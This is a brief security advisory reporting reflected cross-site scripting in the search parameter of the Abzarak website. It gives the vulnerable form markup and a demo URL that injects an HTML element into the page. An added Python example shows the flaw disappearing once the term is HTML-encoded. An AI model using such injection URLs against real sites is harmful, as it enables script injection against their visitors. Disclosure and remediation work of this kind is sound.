Abzarak suffers from a cross site scripting vulnerability.
***************************************************
Abzarak XSS Vulnerability
***************************************************
Author: Mohammad Javanbakht
Email: secanar[at]gmail.com
Blog: secanar.blogspot.com
***************************************************
Exploit:
[site]/?s=[html code] -> (encode ASCII to hex, i.e. percent-encode)
Vulnerable code:
<!--BEGIN #searchform-->
<form class="searchform" method="get" action="http://site">
<input class="search" name="s" type="text" tabindex="1" />
<button name="s-btn" class="search-btn" type="submit" tabindex="2">Search</button>
<!--END #searchform-->
</form>
***************************************************
Demo:
http://www.abzarak.com/?s=%3Cinput+value%3D%22XSS%22%3E%3C%2Finput%3E
***************************************************
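Added example, not part of the original advisory and not Abzarak's code: it decodes the s parameter from the demo URL above and renders it into a results heading with and without HTML output encoding. The server-side template is not shown in the advisory, so render_results and its heading markup are assumptions.

```python
# Added example (not Abzarak's code): the page template below is hypothetical.
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Demo URL taken from the advisory; it is only parsed here, never requested.
DEMO_URL = "http://www.abzarak.com/?s=%3Cinput+value%3D%22XSS%22%3E%3C%2Finput%3E"


def search_term(url):
    """Return the percent-decoded value of the 's' parameter ('' if absent)."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get("s", [""])[0]


def render_results(term, encode):
    """Hypothetical results heading that echoes the search term.

    encode=False concatenates the decoded term into the markup (the flaw);
    encode=True HTML-encodes it first, including quotes for attribute contexts.
    """
    shown = escape(term, quote=True) if encode else term
    return "<h2>Search results for: " + shown + "</h2>"


class _StartTags(HTMLParser):
    """Collects the names of the start tags a parser sees in the markup."""

    def __init__(self):
        super().__init__()
        self.names = []

    def handle_starttag(self, tag, attrs):
        self.names.append(tag)


def start_tags(markup):
    """Return the start-tag names found in markup, in document order."""
    parser = _StartTags()
    parser.feed(markup)
    parser.close()
    return parser.names


if __name__ == "__main__":
    term = search_term(DEMO_URL)
    for encode in (False, True):
        page = render_results(term, encode)
        print("encoded" if encode else "raw", start_tags(page), page)
```

With encoding off, the parser sees an extra input element that came from the query string; with encoding on, the same term stays inside the heading as text.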
END